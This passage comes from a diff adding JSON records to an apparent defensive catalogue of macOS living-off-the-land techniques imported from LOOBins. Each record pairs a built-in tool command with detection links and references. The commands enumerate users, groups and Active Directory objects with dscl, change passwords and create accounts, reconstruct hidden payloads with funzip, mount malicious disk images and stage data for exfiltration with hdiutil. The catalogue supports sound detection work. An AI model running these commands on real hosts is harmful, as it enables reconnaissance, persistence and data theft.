"https://themittenmac.com/what-does-apt-activity-look-like-on-macos", + "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" + ] + }, + { + "id": "loobins:dns-sd:fb0f781dd1ea98d0", + "toolId": "loobins:dns-sd", + "toolName": "dns-sd", + "name": "Discover hosts serving remote screen sharing", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dns-sd -B _rfb._tcp", + "description": "Hosts serving remote screen sharing can be discovered using the _rfb._tcp service string.", + "mitre": [], + "fullPath": [ + "/usr/bin/dns-sd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect dns-sd discovery activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", + "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", + "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" + ] + }, + { + "id": "loobins:dns-sd:917b3a1e5a1ef7f0", + "toolId": "loobins:dns-sd", + "toolName": "dns-sd", + "name": "Discover hosts serving SMB", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dns-sd -B _smb._tcp", + "description": "Hosts serving SMB can be discovered using the _smb._tcp service string.", + "mitre": [], + "fullPath": [ + "/usr/bin/dns-sd" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect dns-sd discovery activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/dns_service_discovery" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml", + "https://themittenmac.com/what-does-apt-activity-look-like-on-macos", + "https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/" + ] + }, + { + "id": "loobins:dscacheutil:93caef4af761b12e", + "toolId": "loobins:dscacheutil", + "toolName": "dscacheutil", + "name": "Lookup a user", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscacheutil -q user -a name <USER_NAME>", + "description": "List the user information", + "mitre": [], + "fullPath": [ + "/usr/bin/dscacheutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml", + "https://macosbin.com/bin/dscacheutil", + "https://ss64.com/osx/dscacheutil.html" + ] + }, + { + "id": "loobins:dscacheutil:f6160d0f4f84e6d3", + "toolId": "loobins:dscacheutil", + "toolName": "dscacheutil", + "name": "Lookup all users", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscacheutil -q user", + "description": "List all user information", + "mitre": [], + "fullPath": [ + "/usr/bin/dscacheutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml", + "https://macosbin.com/bin/dscacheutil", + "https://ss64.com/osx/dscacheutil.html" + ] + }, + { + "id": "loobins:dscl:305c394aed388f3e", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Local user enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl . -list /Users\ndscl . list /Users\ndscl . ls /Users", + "description": "Enumerate all local users.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:87ecd9f8ac4a7b04", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Active Directory user enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl \"/Active Directory/TEST/All Domains\" -list /Users\ndscl \"/Active Directory/TEST/All Domains\" list /Users\ndscl \"/Active Directory/TEST/All Domains\" ls /Users", + "description": "Enumerate all Active Directory users.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:781562790fe8a5bc", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Local user information gathering", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl . -read /Users/$USERNAME\ndscl . read /Users/$USERNAME\ndscl . cat /Users/$USERNAME", + "description": "Gain useful local user information such as when their password was last set, their keyboard layout, their avatar, their home directory, UID and default shell.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:0aaf21612b3bff0f", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Active Directory user information gathering", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl \"/Active Directory/TEST/All Domains\" -read /Users/$USERNAME\ndscl \"/Active Directory/TEST/All Domains\" read /Users/$USERNAME\ndscl \"/Active Directory/TEST/All Domains\" cat /Users/$USERNAME", + "description": "Gain useful Active Directory user information such as when their password was last set, their keyboard layout, their avatar, their home directory, UID and default shell.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:bd588af20e609166", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Local group enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl . -list /Groups\ndscl . list /Groups\ndscl . ls /Groups", + "description": "Enumerate all local groups.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:df32b72c44b8006f", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Active Directory group enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl \"/Active Directory/TEST/All Domains\" -list /Groups\ndscl \"/Active Directory/TEST/All Domains\" list /Groups\ndscl \"/Active Directory/TEST/All Domains\" ls /Groups", + "description": "Enumerate all Active Directory groups.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:c4ea898c6011f465", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Local group information gathering", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl . -read /Groups/$GROUPNAME\ndscl . read /Groups/$GROUPNAME\ndscl . cat /Groups/$GROUPNAME", + "description": "Gain useful local group information such as which users belong to that group, SMB SIDs and group ID. Especially useful for the \"admin\" group.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:865a049f12f3d6ec", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Active Directory group information gathering", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl \"/Active Directory/TEST/All Domains\" -read /Groups/$GROUPNAME\ndscl \"/Active Directory/TEST/All Domains\" read /Groups/$GROUPNAME\ndscl \"/Active Directory/TEST/All Domains\" cat /Groups/$GROUPNAME", + "description": "Gain useful Active Directory group information such as which users belong to that group, SMB SIDs and group ID. Especially useful for the \"admin\" group.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:78cc0d939d564e02", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Computer enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl \"/Active Directory/TEST/All Domains\" -list /Computers\ndscl \"/Active Directory/TEST/All Domains\" list /Computers\ndscl \"/Active Directory/TEST/All Domains\" ls /Computers", + "description": "Enumerate all computers in an Active Directory.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:ea5053a7d3a10be1", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Share enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl . -list /SharePoints\ndscl . list /SharePoints\ndscl . ls /SharePoints", + "description": "Enumerate all shares.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:f13b20540d299c2d", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Password policy discovery", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dscl . -read /Config/shadowhash\ndscl . read /Config/shadowhash\ndscl . cat /Config/shadowhash", + "description": "Gain password policy information", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:d03f29ced7de9fa7", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Change a user password", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "dscl . passwd /Users/$USERNAME oldPassword newPassword", + "description": "Change an existing user's password.", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dscl:f2b5add196364c9e", + "toolId": "loobins:dscl", + "toolName": "dscl", + "name": "Local account creation", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Persistence" + ], + "nativeCategory": [ + "Persistence" + ], + "command": "dscl -create", + "description": "Create a local account", + "mitre": [], + "fullPath": [ + "/usr/bin/dscl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect user account creation with dscl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/user_created_by_dscl" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml", + "https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming", + "https://attack.mitre.org/techniques/T1136/001/" + ] + }, + { + "id": "loobins:dsconfigad:fd9fa9501ea9dc2b", + "toolId": "loobins:dsconfigad", + "toolName": "dsconfigad", + "name": "Retrieves the Active Directory configuration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dsconfigad -show", + "description": "Retrieves the Active Directory configuration", + "mitre": [], + "fullPath": [ + "/usr/sbin/dsconfigad" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml", + "https://macosbin.com/bin/dsconfigad", + "https://www.unix.com/man-page/osx/8/dsconfigad/" + ] + }, + { + "id": "loobins:dsconfigad:ccfb8e32a60568c7", + "toolId": "loobins:dsconfigad", + "toolName": "dsconfigad", + "name": "Retrieves the Active Directory name", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "dsconfigad -show |awk '/Active Directory Domain/{print $NF}'", + "description": "Retrieves the Active Directory name", + "mitre": [], + "fullPath": [ + "/usr/sbin/dsconfigad" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml", + "https://macosbin.com/bin/dsconfigad", + "https://www.unix.com/man-page/osx/8/dsconfigad/" + ] + }, + { + "id": "loobins:dsexport:3d1f9656f3a0dec0", + "toolId": "loobins:dsexport", + "toolName": "dsexport", + "name": "Export local host users", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Reconnaissance", + "Discovery" + ], + "command": "dsexport local_users.txt /Local/Default dsRecTypeStandard:Users", + "description": "Export the local host user information to a file", + "mitre": [], + "fullPath": [ + "/usr/bin/dsexport" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml" + ] + }, + { + "id": "loobins:dsexport:ff2f12c762222565", + "toolId": "loobins:dsexport", + "toolName": "dsexport", + "name": "Export local host groups", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Reconnaissance", + "Discovery" + ], + "command": "dsexport local_groups.txt /Local/Default dsRecTypeStandard:Groups", + "description": "Export the local host group information to a file", + "mitre": [], + "fullPath": [ + "/usr/bin/dsexport" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml" + ] + }, + { + "id": "loobins:funzip:bb11ba6035aeeb1b", + "toolId": "loobins:funzip", + "toolName": "funzip", + "name": "extracts a ZIP or gzip file directly to output from archives or other piped input", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "tail -c <> $0 | funzip -<password>", + "description": "funzip is a macOS utility used to extract ZIP or gzip files directly to output. Malicious binaries misuse funzip, along with head or tail, to extract and reconstruct password-protected malicious payloads.", + "mitre": [], + "fullPath": [ + "/usr/bin/funzip" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/funzip.yml", + "https://www.uptycs.com/blog/threat-research-report-team/macos-bashed-apples-of-shlayer-and-bundlore", + "https://linux.die.net/man/1/funzip" + ] + }, + { + "id": "loobins:hdiutil:1871b601315b0601", + "toolId": "loobins:hdiutil", + "toolName": "hdiutil", + "name": "Mount a malicious dmg file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "hdiutil mount malicious.dmg", + "description": "Uses hdiutil to mount a malicious dmg file to the system.", + "mitre": [], + "fullPath": [ + "/usr/bin/hdiutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Disk Image Mounting Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" + }, + { + "type": "Sigma: Disk Image Creation Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", + "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" + ] + }, + { + "id": "loobins:hdiutil:915ec2752516eb85", + "toolId": "loobins:hdiutil", + "toolName": "hdiutil", + "name": "Mount a malicious dmg file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "hdiutil attach malicious.dmg", + "description": "Uses hdiutil to mount a malicious dmg file to the system.", + "mitre": [], + "fullPath": [ + "/usr/bin/hdiutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Disk Image Mounting Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" + }, + { + "type": "Sigma: Disk Image Creation Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", + "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" + ] + }, + { + "id": "loobins:hdiutil:18567315e0b4f271", + "toolId": "loobins:hdiutil", + "toolName": "hdiutil", + "name": "Mount a malicious iso file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "hdiutil mount malicious.iso", + "description": "Uses hdiutil to mount a malicious iso file to the system.", + "mitre": [], + "fullPath": [ + "/usr/bin/hdiutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Disk Image Mounting Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" + }, + { + "type": "Sigma: Disk Image Creation Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", + "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" + ] + }, + { + "id": "loobins:hdiutil:ccc86b6f28e110a5", + "toolId": "loobins:hdiutil", + "toolName": "hdiutil", + "name": "Mount a malicious iso file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "hdiutil attach malicious.iso", + "description": "Uses hdiutil to mount a malicious iso file to the system.", + "mitre": [], + "fullPath": [ + "/usr/bin/hdiutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: Disk Image Mounting Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_mount.yml" + }, + { + "type": "Sigma: Disk Image Creation Via Hdiutil", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_hdiutil_create.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml", + "https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/" + ] + }, + { + "id": "loobins:hdiutil:66e95ce99ee93ded", + "toolId": "loobins:hdiutil", + "toolName": "hdiutil", + "name": "Exfiltrate data in dmg file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection" + ], + "nativeCategory": [ + "Collection" + ], + "command": "hdiutil create -volname \"Volume Name\" -srcfolder /path/to/folder -ov diskimage.dmg", + "description": "Uses hdiutil to create a dmg file to store exfiltrate data", + "mitre": [], + "fullPath": [ + "/usr/bin/hdiutil" + ], + "environment": [ + "Local host" + ], + 